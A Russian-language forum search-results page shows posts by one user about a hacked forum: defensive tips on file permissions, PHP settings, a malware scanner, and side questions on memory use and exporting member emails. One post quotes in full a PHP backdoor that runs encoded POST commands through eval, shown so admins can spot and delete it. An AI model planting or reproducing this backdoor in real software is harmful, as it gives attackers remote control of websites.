| nikk |
Отправлено: 23 декабря 2013 — 15:05 • Тема: Защита форума.. • Форум: Уязвимости |
Ответов: 21
Просмотров: 0
 |
1Bot пишет:Во все каталоги, доступные для записи,
Не сочтите за наглость, но можно спросить, какие именно каталоги? Папки форум_xxx? Папок очень много: мемберс, javascript, modules, include и пр... Может тупо во все папки ? |
| nikk |
Отправлено: 23 декабря 2013 — 13:14 • Тема: Защита форума.. • Форум: Уязвимости |
Ответов: 21
Просмотров: 0
|
1Bot пишет:1) Включение режима Safe Mode в настройках php.ini safe_mode = on.
прошу пояснить, это вообще где делается?
(Добавление)
1Bot пишет: Как к Вам заливают шеллы? Можно отключить интерпретацию php в папке uploads, или подобной, проверять заливаемые файлы.
можно поподробнее? |
| nikk |
Отправлено: 22 декабря 2013 — 21:00 • Тема: Защита форума.. • Форум: Уязвимости |
Ответов: 21
Просмотров: 0
|
Создать эту тему решил я после того как мои форумы были взломаны...
Предлагаю в этой теме собрать все известные нам способы защиты наших детищ.
Начну я..
Зайдите к себе на форум, в папки форум_1, форум_2, и т.д, внимательно просмотрите свои папки.. Вполне вероятно, вы увидите вот такой примерно файл: 4d370c6a22d6d. php. В файле будет код, примерно такой:
CODE:<?php
if (isset($_COOKIE["adm"])) {
if (isset($_POST['crc'], $_POST['cmd'])) {
if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
eval(gzuncompress(base64_decode($_POST['cmd'])));
} else
echo "repeat_cmd";
}
}
?>
Это значит, Вас "поимели"! Это вредоносный код, удаляйте безжалостно!
Далее.. чтобы вручную не лазить, советую скачать скрипт Айболит..
Ссылка: http://revisium.com/ai/
там все хорошо расписано, зааливайте скрипт в корень, далее анализируйте свои файлы и удаляйте нечисть, которую скрипт обнаружит!
Я с помощью этого скрипта удалил просто неимоверное количество нечисти!
Теперь, если кто знает реальные способы защиты форумов, пишите плиз здесь, будем сообща защищать. 
(Добавление)
Много говорят про выставлении прав на папки и файлы.. У меня изначально стояли права по умолчанию на сервере, папки 775, файлы 644, и тем не менее, бекдор мне залили на форум.. Значит не так спасают эти права, или я не прав?
Пароль от Тотал Командера менять регулярно, тоже наверное вещь хорошая, что и делаю в последнее время.. |
| nikk |
Отправлено: 22 декабря 2013 — 12:38 • Тема: Уязвимость на форуме? • Форум: Уязвимости |
Ответов: 37
Просмотров: 0
|
я поставил себе на все папки и файлы 555.. 
(Добавление)
Права на загружаемые и создаваемые не PHP файлы 777
Права на создаваемые файлы 777
Права на создаваемые папки 777.
что мне в админке выставить с целью максимальной защиты? Тотал Командером выставил права 555 почти на все папки и файлы, кроме uploads, а в админке что выставить? |
| nikk |
Отправлено: 21 декабря 2013 — 19:29 • Тема: Контроль потребления памяти • Форум: Общие вопросы |
Ответов: 8
Просмотров: 0
|
Parapsixolog пишет:Сколько у кого получилось памяти съедает?
[ Script Execution time: 0.255 ] [ Memory: 1304k(pik: 2686k) ][ |
| nikk |
Отправлено: 20 декабря 2013 — 21:15 • Тема: Что за код на HTML? • Форум: HTML |
Ответов: 4
Просмотров: 0
|
ясно... и еще вопрос, у меня на форуме Яндекс нашел вредный код:
CODE:20.12.2013
http://arcticcity.ru/topic.php?forum=20&topic=6
Yandex/MalTds
кто знает, как его найти и удалить? |
| nikk |
Отправлено: 20 декабря 2013 — 21:01 • Тема: Что за код на HTML? • Форум: HTML |
Ответов: 4
Просмотров: 0
|
На голом сайте HTML обнаружил такой код:
CODE:<script language=javaScript>document.onselectstart=new Function("return false");
document.ondragstart=new Function("return false");</script>
Что это? Это не вирус?  |
| nikk |
Отправлено: 17 декабря 2013 — 16:52 • Тема: Как вытащить все email участников своего форума? • Форум: Общие вопросы |
Ответов: 13
Просмотров: 0
|
1Bot пишет:Вытащить просто, необходимо только определить формат, в котором сохранять список адресов.
Как именно? Плиз, помогите..
gudman пишет:nikk, чет я не понял, а чем стандартная рассылка не устраивает?
Да она лично у меня глючит.. Во первых, письма приходят с html-тегами, смотрится ужасно! Во-вторых, многие письма предназначенные участникам, летят мне как админу..
А починить ее некому. |
| nikk |
Отправлено: 17 декабря 2013 — 14:47 • Тема: Как вытащить все email участников своего форума? • Форум: Общие вопросы |
Ответов: 13
Просмотров: 0
|
Всем доброго вечера! )
Хочу сделать массовую рассылку участникам своего форума, их у меня 1822..
Как мне вытащить залпом все email своих участников? Можно ли это в принципе сделать? Не вручную копировать каждого, а с списком или файлом? |
|
Сайт проекта ExBB
Чат на форуме
Помощь
Поиск
BanList
Найдено сообщений: 1127